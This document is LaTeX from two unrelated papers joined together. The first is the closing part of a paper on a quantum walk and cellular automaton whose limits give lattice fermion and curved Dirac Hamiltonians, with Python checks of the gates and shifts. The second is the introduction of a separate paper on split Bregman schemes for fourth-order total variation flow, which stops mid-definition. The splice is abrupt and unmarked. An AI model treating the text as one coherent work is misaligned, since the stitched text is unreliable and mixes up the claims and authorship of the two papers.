The dynamics acts in four steps. The even steps act according to a partition $\mathcal{P}$; the odd steps act according to the same partition, but half-shifted, i.e. $\mathcal{Q}$. By `partition', we mean a way of grouping subcells, to then act upon them with the synchronous application of a local unitary, across space. Partition $\mathcal{P}$ groups the right subcell of the left cells, with the left subcell of the right cells, in order to act upon them with a local unitary gate. In the first step, this local unitary gate is $U$, which can therefore be thought of as being located at positions $(t_j+\frac{\Delta_t}{2},x_l+\frac{\Delta_x}{2})$ for $j\in 2\mathbb{N}$ and $l\in\mathbb{Z}$. In the third step, this local unitary gate is $U^*$, which can therefore be thought of as being located at positions $(t_j+\frac{3\Delta_t}{2},x_l+\frac{\Delta_x}{2})$ for $j\in 2\mathbb{N}+1$ and $l\in\mathbb{Z}$. Partition $\mathcal{Q}$ simply regroups the left and right subcell of a given cell, i.e. the local unitary acts per cell. In both the second and fourth steps the local unitary is $V$, which can therefore be thought of as being located at positions $(t_j,x_l)$ for $j\in \mathbb{N}$ and $l\in\mathbb{Z}$.
The local unitary gate $V$ is the simplest:
\begin{equation}
V=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & 0& 1& 0\\
0 & 1& 0& 0\\
0 & 0 & 0& -1
\end{pmatrix}
\end{equation}
\begin{small}
\begin{align}
= |00\rangle\langle 00|+|01\rangle\langle 10|\\
+|10\rangle\langle 01|-|11\rangle\langle 11|,
\end{align}
\end{small}
i.e. it is a mere swap, just represented by the wire crossings in Fig.~\ref{fig:QCA}. Its only oddity is the $(-1)$ phase when two excitations permute: we refer to \cite{ArrighiToyQED} for a justification.
The local unitary gate $U$, on the other hand, acts non-trivially in the one-particle sector, in a way which is related to the coin operator:
\begin{equation}
U=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & e^{-i \zeta}\sin\theta & -\cos\theta & 0\\
0 & \cos\theta & e^{i \zeta}\sin\theta & 0\\
0 & 0 & 0 & -1
\end{pmatrix}
\end{equation}
\begin{small}
\begin{align}
= |00\rangle\langle 00|+ e^{-i \zeta}\sin\theta |01\rangle\langle 01| -\cos\theta |01\rangle\langle 10|\\+ \cos\theta |10\rangle\langle 01|
+e^{i \zeta}\sin\theta |10\rangle\langle 10|- |11\rangle\langle 11|.
\end{align}
\end{small}
Altogether, the global evolution is:
\[
\Psi(t_j+2\Delta_t)= G \Psi(t_j)
\]
\[
G= \bigotimes_{\cal Q} V \bigotimes_{{\cal P}} U^* \bigotimes_{\cal Q} V \bigotimes_{{\cal P}} U
\]
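As a sanity check, the gates $V$ and $U$ can be verified numerically; the sketch below (with arbitrary illustrative angles $\theta,\zeta$) confirms that both are unitary and that $V$ squares to the identity, as expected of a signed swap:

```python
import numpy as np

theta, zeta = 1.2, 0.3   # illustrative values; any real angles work here

# The signed swap V
V = np.array([[1, 0, 0, 0],
              [0, 0, 1, 0],
              [0, 1, 0, 0],
              [0, 0, 0, -1]], dtype=complex)

# The gate U, acting non-trivially in the one-particle sector
U = np.array([[1, 0, 0, 0],
              [0, np.exp(-1j * zeta) * np.sin(theta), -np.cos(theta), 0],
              [0, np.cos(theta), np.exp(1j * zeta) * np.sin(theta), 0],
              [0, 0, 0, -1]])

assert np.allclose(V @ V.conj().T, np.eye(4))   # V is unitary
assert np.allclose(V @ V, np.eye(4))            # V is an involution
assert np.allclose(U @ U.conj().T, np.eye(4))   # U is unitary
```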
We wish to argue that in the discrete-space continuous-time limit, this Plastic QCA behaves like many-particle non-interacting lattice fermions. We will do so by focussing on the one-particle sector behaviour of this QCA, and then second quantizing it by standard methods. Here is the one-particle sector:
\begin{small}
\begin{align}
\Psi(t_j) =\sum_{l\in\mathbb{Z}} &\psi^+(x_l,t_j) \ldots\ket{00}^{l-1}\ket{10}^l\ket{00}^{l+1}\ldots+\\
&\psi^-(x_l,t_j) \ldots\ket{00}^{l-1}\ket{01}^l\ket{00}^{l+1}\ldots
\end{align}
\end{small}
After a tedious but straightforward calculation, we can extract the recurrence relation for the amplitudes $\psi_l(t_j) = \{\psi^+(x_l,t_j),\psi^-(x_l,t_j)\}$ at time $t_j+2\Delta_t$; Taylor expand them around $\varepsilon = 0$ using the scalings \eqref{eq:scalings2} for $\alpha=1$; and take the formal limit for $\varepsilon \longrightarrow 0$. This yields, with a spacetime dependent $U$, the discretized one-particle Hamiltonian:
\begin{small}
\begin{multline}
H_{\mathcal{G}d} \psi_l(t) =\frac{i}{2 } \sigma_x \left(c_{l-\frac{\Delta_x}{2}}\psi_{l-\Delta_x}-c_{l+\frac{\Delta_x}{2}}\psi_{l+\Delta_x}\right) - m \sigma_z \psi_l.
\label{eq:discretDH_C}
\end{multline}
\end{small}
This is our proposed curved spacetime lattice fermion Hamiltonian. One can check that in the continuous-space limit, this Hamiltonian goes to the standard, continuous spacetime Hamiltonian of the curved $(1+1)$--spacetime Dirac equation in synchronous coordinates. Moreover, the proposed Hamiltonian \eqref{eq:discretDH_C} coincides, in the case of a homogeneous and static metric, with the usual one-particle lattice fermion Hamiltonian:
\begin{equation}
H_{d} \psi_l(t) =\frac{i c}{2 } \sigma_x \left(\psi_{l-\Delta_x}-\psi_{l+\Delta_x}\right) - m \sigma_z \psi_l.
\label{eq:discretDH}
\end{equation}
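As a quick consistency check of \eqref{eq:discretDH_C} and \eqref{eq:discretDH}, one can assemble both Hamiltonians on a small periodic chain (hypothetical sizes and parameters, with $\Delta_x=1$) and verify that the curved-space operator is self-adjoint, while the homogeneous one has the expected lattice dispersion $\pm\sqrt{c^2\sin^2 k+m^2}$:

```python
import numpy as np

N, c, m = 16, 0.8, 0.5
sx = np.array([[0, 1], [1, 0]], dtype=complex)
sz = np.array([[1, 0], [0, -1]], dtype=complex)

# Periodic shifts: (Tm psi)_l = psi_{l-1}, (Tp psi)_l = psi_{l+1}
Tm = np.roll(np.eye(N), -1, axis=1)
Tp = np.roll(np.eye(N), 1, axis=1)

# Homogeneous case, eq. (discretDH): H = (i c / 2)(Tm - Tp) (x) sigma_x - m Id (x) sigma_z
H = 0.5j * c * np.kron(Tm - Tp, sx) - m * np.kron(np.eye(N), sz)
assert np.allclose(H, H.conj().T)                       # self-adjoint

k = 2 * np.pi * np.arange(N) / N
disp = np.sqrt(c**2 * np.sin(k)**2 + m**2)
expected = np.sort(np.concatenate([disp, -disp]))
assert np.allclose(np.linalg.eigvalsh(H), expected)     # lattice Dirac dispersion

# Inhomogeneous case, eq. (discretDH_C): a hypothetical smooth c at midpoints c_{l+1/2}
c_half = 0.5 + 0.3 * np.cos(2 * np.pi * (np.arange(N) + 0.5) / N)
M = Tm @ np.diag(c_half) - np.diag(c_half) @ Tp          # M[l,l-1]=c_{l-1/2}, M[l,l+1]=-c_{l+1/2}
Hc = 0.5j * np.kron(M, sx) - m * np.kron(np.eye(N), sz)
assert np.allclose(Hc, Hc.conj().T)                      # curved Hamiltonian is self-adjoint
```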
This latter Hamiltonian, when massless, commutes with $\sigma_x$ (preserving the chiral symmetry). Any other massless representation, e.g. one commuting with $\sigma_y$, can be recovered by choosing a different phase in the operator $U$\footnote{In order to recover a massless Hamiltonian commuting with $\sigma_y$ we can choose the operator \begin{equation}
U'=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & e^{-i \zeta}\sin \theta & -\cos \theta & 0\\
0 & \cos \theta & -e^{i \zeta}\sin \theta & 0\\
0 & 0 & 0 & -1
\end{pmatrix}
\end{equation}}.
The one-particle lattice fermion Hamiltonian of \eqref{eq:discretDH} is quite comparable to that of \eqref{eq:case1eq}, but has the advantage of being rather well-known and admitting a standard second-quantization \cite{kogut1975hamiltonian}. Moreover the two can be related in the discrete spacetime picture in the sense that the one-particle sector of $G$ coincides with $W$ up to an initial encoding. Indeed, $G$ acts in the one-particle sector as follows:
\begin{equation}
W' =( \hat{S}^-{\hat{C}_{-\zeta}} \hat{S}^+) ( \hat{S}^-{\hat{C}_{\zeta}} \hat{S}^+ )
\end{equation}
where $\hat{S}^\pm$ are partial shifts in space:
$$
(\hat{S}^+\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j,l+1}\\\psi^-_{j,l}\end{pmatrix}
\quad
(\hat{S}^-\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j,l}\\\psi^-_{j,l-1}\end{pmatrix}
$$
The operator is thus equivalent to $W^\theta_\zeta$ up to an encoding $E = {S^+}$ and setting $\Lambda= I_2$:
\begin{equation}
{W'}^{\theta}_{\zeta} = E^\dagger{W}^{\theta}_{\zeta} E.
\end{equation}
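With our grid conventions, the partial shifts are simple periodic translations of the individual spinor components; the following sketch (using \texttt{np.roll} for the periodic wrapping) checks that composing $\hat{S}^+$ and $\hat{S}^-$, in either order, reproduces the full shift $\hat{S}$, which moves the two components in opposite directions:

```python
import numpy as np

# One-particle wavefunction on N sites: row 0 is psi^+, row 1 is psi^-.
N = 8
rng = np.random.default_rng(0)
psi = rng.standard_normal((2, N)) + 1j * rng.standard_normal((2, N))

def S_plus(p):    # (S^+ psi)_l = (psi^+_{l+1}, psi^-_l)
    return np.stack([np.roll(p[0], -1), p[1]])

def S_minus(p):   # (S^- psi)_l = (psi^+_l, psi^-_{l-1})
    return np.stack([p[0], np.roll(p[1], 1)])

def S_full(p):    # full shift: + and - components move in opposite directions
    return np.stack([np.roll(p[0], -1), np.roll(p[1], 1)])

assert np.allclose(S_plus(S_minus(psi)), S_full(psi))
assert np.allclose(S_minus(S_plus(psi)), S_full(psi))
```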
From \eqref{eq:discretDH} we can derive the continuous-time Kogut-Susskind Hamiltonian of the free Dirac QFT (a self-adjoint operator on the Fock space) using the more abstract language of modern quantum field theory. We can lift the discretized single-particle Hamiltonian to a self-adjoint operator on the Fock space $\mathcal{F}$ according to
\begin{multline}
\hat{H} = \sum_l \hat{\Psi}^*(H_df_l)\hat\Psi(f_l) = \\
\frac{1}{2} \sum_l\big[ \hat\Psi^{2\dagger}_{l+1} \hat\Psi^{1}_{l} + \hat\Psi^{2\dagger}_{l} \hat\Psi^{1}_{l+1} + h.c.\big] + m \sum_l \big[ \hat\Psi^{1\dagger}_{l} \hat\Psi^{1}_{l} - \hat\Psi^{2\dagger}_{l} \hat\Psi^{2}_{l} \big]. \label{eq:manyparticleKG}
\end{multline}
where the second quantized discretized Dirac field operator
\begin{equation}
\hat\Psi^\alpha_l = \hat\Psi^\alpha_l(f_l) = \int dx \hat\Psi^\alpha(x) f^*_l(x) \hspace{0.5cm} \alpha = \{+, -\}
\end{equation}
satisfies the canonical anti-commutation relations, and the orthonormal set of basis functions $f_l$ spans the discretized Hilbert space $\ell^2(\mathbb{Z})$. Notice that the above equation takes the form of a Fermi-Hubbard Hamiltonian, where the first term implements the hopping between neighboring sites and the second term is a local term accounting for the mass.
Altogether, this provides strong evidence that the Plastic QCA $G$ has the free Dirac Kogut-Susskind Hamiltonian \eqref{eq:manyparticleKG} as its discrete-space continuous-time limit. However, it would be preferable to prove this directly in the many-particle sector, without restricting to the one-particle sector and then second-quantizing. We leave this question open.
\section{Conclusion}\label{sec:conclusion}
{\em Summary of results.} We introduced a Quantum Walk (QW) over the $(1+1)$--spacetime grid, given by \eqref{eq:FDE0}.
The QW has parameters $m$, $c$, $\varepsilon$, $\alpha$. The first two are parameters of the physics that we simulate: $m$ is the mass of the Dirac fermion, $c$ is the speed of light. The second two control the scaling of the discretization: $\varepsilon\longrightarrow 0$ whenever we take a continuum limit, whereas $0\leq\alpha\leq 1$ remains fixed but determines which limit is to be taken, by specifying the relative scalings of $\Delta_t=\varepsilon$ and $\Delta_x=\varepsilon^{1-\alpha}$. When $\alpha=0$ the continuous-spacetime limit ($\Delta_x=\Delta_t\longrightarrow 0$) yields the Dirac equation. The same is true of all intermediate cases $0\leq\alpha<1$. But when $\alpha=1$, the continuous-time discrete-space limit ($\Delta_x$ finite, $\Delta_t\longrightarrow 0$) gets triggered, and yields the lattice fermion Hamiltonian. The result is encapsulated in Th. \ref{th:limits}, and generalized to a spacetime dependent $c(x,t)$ in Th. \ref{th:curvedlimits}, recovering the curved spacetime lattice fermion Hamiltonian and Dirac equation in synchronous coordinates. Finally the QW is made into a QCA by considering many non-interacting particles; in the limits this yields free Dirac QFT as expected, i.e. lattice fermions for many non-interacting particles.
{\em Perspectives.} The QCA may be viewed as a discrete-spacetime version of free Dirac QFT. In the same way that free Dirac QFT has the lattice fermions as its asymmetric space-discretization, this QCA has the lattice fermions as its asymmetric continuous-time limit. It is unitary and strictly respects the speed of light. Our long term aim is to add interactions to this QCA, thereby obtaining a discrete-spacetime version of some interacting QFT in the style of \cite{ArrighiToyQED}---except that it would support a continuous-time limit towards the non-relativistic, discrete-space continuous-time reformulations of the interacting QFT, for due validation. Discrete-space continuous-time may well be the friendly place where QCA and QFT should meet, after all.\\ An unexpected by-product of this work is the provision of a space-discretization of the curved $(1+1)$--spacetime Dirac equation in synchronous coordinates, i.e. the provision of an original curved lattice fermions Hamiltonian. This opens the route for elaborating curved Kogut-Susskind Hamiltonians, and eventually suggesting Hamiltonian-based quantum simulators of interacting particles over a curved background.\\
An interesting remark raised by one of the anonymous referees is the following. On the one hand, the non-relativistic, naive lattice fermions Hamiltonians are known \cite{kogut1975hamiltonian} to suffer the fermion-doubling problem, i.e. a spurious degree of freedom. On the other hand, the Dirac QW does not suffer this problem \cite{ArrighiChiral}. An intriguing question is whether the Plastic QW hereby presented, which borrows from both worlds, suffers this problem or not. We leave this as an open question.
Finally, we wonder whether the Schr\"odinger limit ($c \longrightarrow \infty$) could be fitted into the picture.
\section{Competing interests}
The authors declare that there are no competing interests.
\section{Author Contribution}
GDM and PA contributed equally to the main results of the manuscript.
\section{Data Availability}
No data sets were generated or analysed during the current study.
\section*{Acknowledgements} The authors would like to thank Pablo Arnault and C\'edric B\'eny for motivating discussions.
\bibliographystyle{plain}
\section{Introduction}
Gradient flows have been of great interest in mathematics and mathematical physics because several evolution equations can be regarded as gradient flows. For example, mathematical models in materials science, including the Allen-Cahn equation and the mean curvature flow, can be regarded as second order $L^2$-gradient flows. The Cahn-Hilliard equation is interpreted as a fourth-order $H^{-1}$-gradient flow.
We are interested in several important examples of gradient flows which are of the form
\begin{equation}
\label{Eq:GradientFlow_for_Hilbert}
\dfrac{\partial u}{\partial t} \in -\partial_H E(u)\mbox{ for }t>0,
\end{equation}
where $H$ is a Hilbert space, $E:H\to\mathbb{R}\cup\{\infty\}$ is a convex, lower semi-continuous functional and the subdifferential $\partial_H$ is defined as
\begin{equation}
\partial_HE(u) = \left\{p\in H : E(v)-E(u)\ge(p,v-u)_H\mbox{ for all }v\in H\right\}.
\end{equation}
In this paper, we consider gradient flows \eqref{Eq:GradientFlow_for_Hilbert} with a convex energy $E$ that may be very singular.
We give a few examples. Spohn \cite{Sp93} has proposed a mathematical model for the relaxation of a crystalline surface below the roughening temperature;
\begin{equation}
\label{Eq:SpohnFourthOrder}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
where $\beta>0$ and $p>1$.
Kashima \cite{Kas04} has presented this model as a fourth order $H^{-1}$-gradient flow for the energy functional
\begin{equation}
\label{Eq:SpohnModel}
E(u) = \beta\displaystyle\int_{\Omega}|Du| + \dfrac{1}{p}\int_{\Omega}|Du|^p.
\end{equation}
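For concreteness, the energy \eqref{Eq:SpohnModel} is easy to evaluate for a grid function on the torus; the sketch below uses a simple periodic forward-difference quadrature (our own illustrative choice, not a scheme from the literature):

```python
import numpy as np

def spohn_energy(u, beta, p, dx):
    """Discrete version of E(u) = beta*int|Du| + (1/p)*int|Du|^p on the torus,
    with Du approximated by periodic forward differences."""
    du = (np.roll(u, -1) - u) / dx
    return beta * np.sum(np.abs(du)) * dx + np.sum(np.abs(du)**p) * dx / p

N = 64
x = np.arange(N) / N
assert spohn_energy(np.ones(N), beta=1.0, p=3, dx=1.0/N) == 0.0  # constants cost nothing
assert spohn_energy(np.cos(2*np.pi*x), beta=1.0, p=3, dx=1.0/N) > 0.0
```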
Furthermore, the total variation flow, which is the gradient flow for the total variation energy, has been studied extensively in image processing. In 1992, Rudin, Osher and Fatemi \cite{ROF92} introduced the total variation to image denoising and reconstruction. Their model, which is known as the Rudin-Osher-Fatemi (ROF) model, is described as
\begin{equation}
u = \mathop{\mathrm{argmin}}_{u\in L^2(\Omega)} \left\{\displaystyle\int_{\Omega}|Du|+\dfrac{\lambda}{2}\|u-f\|_{L^2(\Omega)}^2\right\},
\end{equation}
where $\Omega\subset\mathbb{R}^2$ is bounded domain and $f:\Omega\to\mathbb{R}$ is a given noisy image.
This introduces the second order total variation flow
\begin{equation}
u_t = \operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right) + \lambda(u-f).
\end{equation}
On the other hand, Osher, Sol\'{e} and Vese \cite{OSV03} have introduced the $H^{-1}$ fidelity and provided Osher-Sol\'e-Vese (OSV) model
\begin{equation}
\label{OSVmodel}
u=\mathop{\mathrm{argmin}}_{u\in H^{-1}(\Omega)}\left\{\displaystyle\int_{\Omega}|Du|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}(\Omega)}^2\right\},
\end{equation}
where $H^{-1}(\Omega) = (H^1_0(\Omega))^*$. Their model performs better on textured or oscillatory images. Equation \eqref{OSVmodel} gives the fourth order total variation flow
\begin{equation}
\label{Eq:FourthOrder}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)\right)+\lambda(u-f).
\end{equation}
Performing numerical computations for the ROF model, the OSV model and the total variation flow is difficult because of the singularity. Several studies have suggested numerical schemes for the ROF model and the second order total variation flow. In particular, the split Bregman framework is well-known as an efficient solver for the ROF model.
The aim of this paper is to provide a new numerical scheme, which is based on the backward Euler method and split Bregman framework, for fourth order total variation flow and Spohn's fourth order model. Numerical experiments are demonstrated for fourth order problems under periodic boundary condition.
The split Bregman method, which is based on the Bregman iterative scheme \cite{Br'e67}, has been studied and performed in image processing (for example, see \cite{OBG05}).
Goldstein and Osher \cite{GO09} have proposed the alternating split Bregman method. Their method separates the ``$L^1$'' minimization part and ``$L^2$'' part.
The alternating split Bregman method has several advantages. They have mentioned that the ``$L^2$'' part is differentiable, and the shrinking method can be applied to the ``$L^1$'' part for the ROF model. Therefore it is an extremely efficient solver and easy to code. The split Bregman framework can be performed for second order total variation flow easily. For example,
\begin{equation}
\label{Eq:Second_TV_Flow}
u_t = \operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)
\end{equation}
introduces the subdifferential formulation $u_t\in -\partial F(u)$, where $F(u) = \int_{\Omega}|Du|$.
We let $u_t\approx (u^{k+1}-u^k)/\tau$ and apply the backward Euler method to the subdifferential formulation, then we obtain
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in L^2(\Omega)}\left\{\displaystyle\int_{\Omega}|Du|+\dfrac{1}{2\tau}\|u-u^k\|_{L^2(\Omega)}^2\right\},
\end{equation}
where $\tau$ is the time step size. This is essentially the same problem as the ROF model; therefore the split Bregman framework can be applied to second order total variation flow.
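To illustrate, here is a minimal Python sketch of one such backward Euler step on a periodic 1D grid, solved by the alternating split Bregman iteration; the penalty parameter $\lambda$, the FFT-based solve of the $u$-subproblem and the shrinkage formula are standard solver ingredients, while the specific parameter values are illustrative only:

```python
import numpy as np

def tv_backward_euler_step(f, tau, lam=1.0, iters=300):
    """Approximates u = argmin_u sum_l |(Du)_l| + (1/(2*tau))*||u - f||^2
    (one backward Euler step of the 1D periodic TV flow) by split Bregman."""
    N = f.size
    k = 2.0 * np.pi * np.arange(N) / N
    symbol = 1.0 / tau + lam * (2.0 - 2.0 * np.cos(k))  # symbol of I/tau + lam*D^T D
    D = lambda v: np.roll(v, -1) - v                    # periodic forward difference
    DT = lambda v: np.roll(v, 1) - v                    # its transpose
    shrink = lambda a, kap: np.sign(a) * np.maximum(np.abs(a) - kap, 0.0)

    u, d, b = f.copy(), np.zeros(N), np.zeros(N)
    for _ in range(iters):
        rhs = f / tau + lam * DT(d - b)
        u = np.real(np.fft.ifft(np.fft.fft(rhs) / symbol))  # exact u-subproblem solve
        d = shrink(D(u) + b, 1.0 / lam)                     # closed-form d-subproblem
        b = b + D(u) - d                                    # Bregman update
    return u

# Illustrative run on a periodic step profile: the objective value of the
# computed step falls below that of the initial datum.
N = 32
f = np.zeros(N); f[8:24] = 1.0
u = tv_backward_euler_step(f, tau=0.5, lam=2.0)
D = lambda v: np.roll(v, -1) - v
obj = lambda v: np.sum(np.abs(D(v))) + np.sum((v - f)**2) / (2 * 0.5)
assert obj(u) < obj(f)
```

The $u$-subproblem is the linear system $(I/\tau + \lambda D^{\top}D)u = f/\tau + \lambda D^{\top}(d-b)$, which is diagonalized exactly by the FFT on the periodic grid.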
In this paper, we propose the split Bregman framework for the OSV model \eqref{OSVmodel}, fourth order total variation flow
\begin{equation}
\label{Eq:FourthOrderTVFlow}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)\right)
\end{equation}
and Spohn's fourth order model \eqref{Eq:SpohnFourthOrder}. For simplicity, we consider the one-dimensional torus $\mathbb{T}$. We introduce a spatial discretization by piecewise constant functions; then we compute $\nabla(-\Delta_{\mathrm{av}})^{-1}v_h$ for a piecewise constant function $v_h$ approximately or exactly.
We apply the discrete gradient and discrete inverse Laplacian in our first scheme.
In our second scheme, we calculate the inverse Laplacian for piecewise constant functions directly by using the second degree B-spline, which consists of continuously differentiable piecewise polynomials.
The problem can be reduced to a minimization problem on a Euclidean space, as considered in earlier studies for the ROF model.
Therefore we can apply the split Bregman framework to fourth order problems.
Several theoretical results such as the convergence \cite{COS10} can be applied to our scheme directly.
Both of our schemes are demonstrated for fourth order problems, and we can check that they perform quite well.
Furthermore, we introduce a new shrinkage operator for Spohn's fourth order model. This enables us to perform the numerical experiment for the relaxation of a crystalline surface below the roughening temperature quite effectively. Our scheme can be extended to fourth order problems on the two-dimensional torus. We also suggest a shrinkage operator for two-dimensional Spohn's model.
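For orientation, the $H^{-1}$ quantities involved are straightforward to evaluate spectrally; the following sketch (an FFT-based illustration with the Fourier convention $e^{-2\pi i \xi x}$, so that $-\Delta$ has symbol $(2\pi\xi)^2$---this is not our B-spline scheme) reproduces the exact value $\|\cos(2\pi x)\|_{H^{-1}}^2 = 1/(8\pi^2)$ for the mean-zero function $\cos(2\pi x)$:

```python
import numpy as np

def h_minus_1_norm_sq(v):
    """||v||_{H^-1}^2 on the torus [0,1] for a mean-zero grid sample v:
    sum over nonzero integer modes xi of |v_hat(xi)|^2 / (2*pi*xi)^2."""
    N = v.size
    vhat = np.fft.fft(v) / N             # trapezoidal Fourier coefficients
    xi = np.fft.fftfreq(N, d=1.0 / N)    # integer frequencies
    nz = xi != 0
    return np.sum(np.abs(vhat[nz])**2 / (2.0 * np.pi * xi[nz])**2)

N = 256
x = np.arange(N) / N
assert np.isclose(h_minus_1_norm_sq(np.cos(2*np.pi*x)), 1.0 / (8.0 * np.pi**2))
```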
Let us quickly overview some earlier results.
There are many mathematical studies for the second and fourth order total variation flow. The well-posedness for fourth order total variation flow can be proved by considering the right hand side in \eqref{Eq:FourthOrderTVFlow} as a subdifferential of a total variation in $H^{-1}(\Omega)$ (see \cite{Kas04}). This enables us to use the theory of maximal monotone operators \cite{Kom67,Bre73}.
On the other hand, Elliott and Smitheman \cite{ES07} have proved the well-posedness for fourth order total variation flow by using the Galerkin method.
Adjusting the methods in \cite{GK11}, Giga, Kuroda and Matsuoka \cite{GKM14} have established the extinction time estimate under Dirichlet boundary condition.
Numerical computations which include anisotropic diffusion are performed in \cite{MMR15} for second order models.
Note that even for the second order total variation flow \eqref{Eq:Second_TV_Flow}, because of singularity at $\nabla u=0$, the speed of evolution is determined by nonlocal quantities. Therefore the definition of the solution itself is nontrivial.
For the second order model, the comparison principle holds, and the theory of viscosity solutions is applicable to show well-posedness for a wide class of total variation type equations \cite{GGP13,GGP14}. However, for the fourth order problem, the comparison principle does not hold in general (see \cite[Theorem 3.7]{GG10}), and the theory of viscosity solutions is not applicable.
For more details of mathematical analysis, we refer the reader to \cite{GG10} and references therein.
Several studies have considered the fourth order problem under periodic boundary condition.
Kashima \cite{Kas12} has studied the characterization of subdifferential in $H_{\mathrm{av}}^{-1}(\mathbb{T}^d)$.
The exact profile of the fourth order total variation flow has been studied in \cite{GG10}. The extinction time estimate under periodic boundary condition has been established in \cite{GK11}.
A duality based numerical scheme which applies the forward-backward splitting has been proposed in \cite{GMR19}.
Kohn and Versieux \cite{KV10} have performed the numerical computation for Spohn's model. Their numerical scheme is based on the backward Euler method, mixed finite element method and regularization for singularity. They have proved the convergence by combining the regularization error estimate with temporal and spatial semidiscretization error estimates.
The application of the split Bregman framework to crystalline flow has also been studied through what is called a level-set method.
A crystalline mean curvature flow has been proposed independently in \cite{AG89} and \cite{Tay91}.
Oberman, Osher, Takei and Tsai \cite{OOTT11} have proposed applying the split Bregman framework to the level-set equation of mean curvature flow. Po\v{z}\'{a}r \cite{Poza18} has studied self-similar solutions of three dimensional crystalline mean curvature flow and presented a numerical scheme which is based on the finite element method and split Bregman framework. However, all calculations given there are for the second order model.
A level-set method for mean curvature flow interprets the motion of curvature flow by a level-set of a solution of
\begin{equation}
\label{Eq:LevelSetMeanCurvature}
\dfrac{\partial u}{\partial t}-|\nabla u|\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)=0.
\end{equation}
It is a powerful tool to calculate evolution which experiences topological change. It was introduced by Osher and Sethian \cite{OS88} as a numerical way to calculate the mean curvature flow. Note that the level-set mean curvature equation \eqref{Eq:LevelSetMeanCurvature} looks similar to \eqref{Eq:Second_TV_Flow}. However, the singularity of \eqref{Eq:LevelSetMeanCurvature} at $\nabla u=0$ is weaker than that of \eqref{Eq:Second_TV_Flow} because of the multiplier $|\nabla u|$. Therefore it is not necessary to study nonlocal quantities for the level-set mean curvature equation. Its analytic foundation such as well-posedness and the comparison principle has been established in \cite{CGG91,ES91}. For more details, we refer the readers to \cite{Gig06}. Very recently, the analytic foundation of the level-set method has been extended to crystalline flow by Po\v{z}\'{a}r and the first author \cite{GP16,GP18} and by Chambolle, Morini and Ponsiglione \cite{CMP17} and with Novaga \cite{CMNP17} independently. Their methods are quite different.
This paper is organized as follows. Section \ref{Sec:Preliminary} recalls the definitions of $H^{-1}_{\mathrm{av}}(\mathbb{T})$ and the total variation. We introduce the discretization by piecewise constant functions in Section \ref{Sec:Discrete}. Furthermore, we propose two schemes for reducing $\|\cdot\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$ to a Euclidean norm. Section \ref{Sec:SplitBregman} presents the split Bregman framework for the OSV model and the fourth order total variation flow problem. In Section \ref{Sec:Spohn}, we describe the shrinking method for Spohn's model. We present numerical examples on the one-dimensional torus in Section \ref{Sec:NumExample}. Finally, we extend our scheme to two-dimensional fourth order problems under periodic boundary conditions in Section \ref{Sec:TwoDim}.
\section{Preliminary}
\label{Sec:Preliminary}
\subsection{Fourier analysis on the torus $\mathbb{T}$}
First, we review some standard facts of Fourier analysis on the one-dimensional torus $\mathbb{T} = \mathbb{R}/\mathbb{Z}$. In this paper, we regard $\mathbb{T}$ as the interval $[0,1]$ with periodic boundary condition. The Fourier transform for $f\in L^1(\mathbb{T})$ and the definition of Sobolev spaces on $\mathbb{R}$ are explained in \cite[Chapter 3]{Gra14a} and \cite[Chapter 1.3]{Gra14b}, respectively.
Let $\mathcal{D}(\mathbb{T})$ be the space of complex-valued functions $C^{\infty}(\mathbb{T})$ endowed with the usual test function topology, and let $\mathcal{D}'(\mathbb{T})$ be its dual. The Fourier coefficient $\widehat{f}_T(\xi)\in \mathbb{C}$ for $f\in \mathcal{D}'(\mathbb{T})$ is defined by the generalized Fourier transform (for example, see \cite[Chapter 5]{Gru09}):
\begin{equation}
\widehat{f}_T(\xi) = \langle f,e^{-2\pi i\xi x}\rangle_{\mathcal{D}'(\mathbb{T}),\mathcal{D}(\mathbb{T})}.
\end{equation}
The generalized Fourier transform satisfies properties analogous to those of the Fourier transform of $f\in L^1(\mathbb{T})$; for example,
\begin{equation}
\label{Eq:FourierDeriv}
\widehat{df/dx}_T(\xi) = -\left\langle f,\dfrac{d}{dx}e^{-2\pi i\xi x}\right\rangle_{\mathcal{D}'(\mathbb{T}),\mathcal{D}(\mathbb{T})} = 2\pi i\xi\widehat{f}_T(\xi)
\end{equation}
for all $f\in\mathcal{D}'(\mathbb{T})$.
Furthermore, the Fourier coefficients $\widehat{f}_T(\xi)\in\mathbb{C}$ satisfy the inversion formula
\begin{equation}
f(x) = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{f}_T(\xi)e^{2\pi i\xi x}
\end{equation}
for all $f\in \mathcal{D}'(\mathbb{T})$ (see \cite[Chapter 8.2]{Gru09}).
In this Fourier series, the convergence should be understood in the natural topology of $\mathcal{D}'(\mathbb{T})$.
It is well known that $\mathcal{D}(\mathbb{T})$ is dense in $L^2(\mathbb{T})$; therefore we have $L^2(\mathbb{T})\simeq (L^2(\mathbb{T}))^*\subset \mathcal{D}'(\mathbb{T})$, where $(L^2(\mathbb{T}))^*$ is the dual space of $L^2(\mathbb{T})$ (for example, see \cite[Chapter 5.2]{Bre11}).
Using the generalized Fourier transform, the Lebesgue space and the Sobolev space on $\mathbb{T}$ are defined as follows:
\begin{equation}
\label{Def:L2T}
L^2(\mathbb{T}) = \left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}|\widehat{f}_T(\xi)|^2<\infty\right\},
\end{equation}
\begin{equation}
\label{Def:H1T}
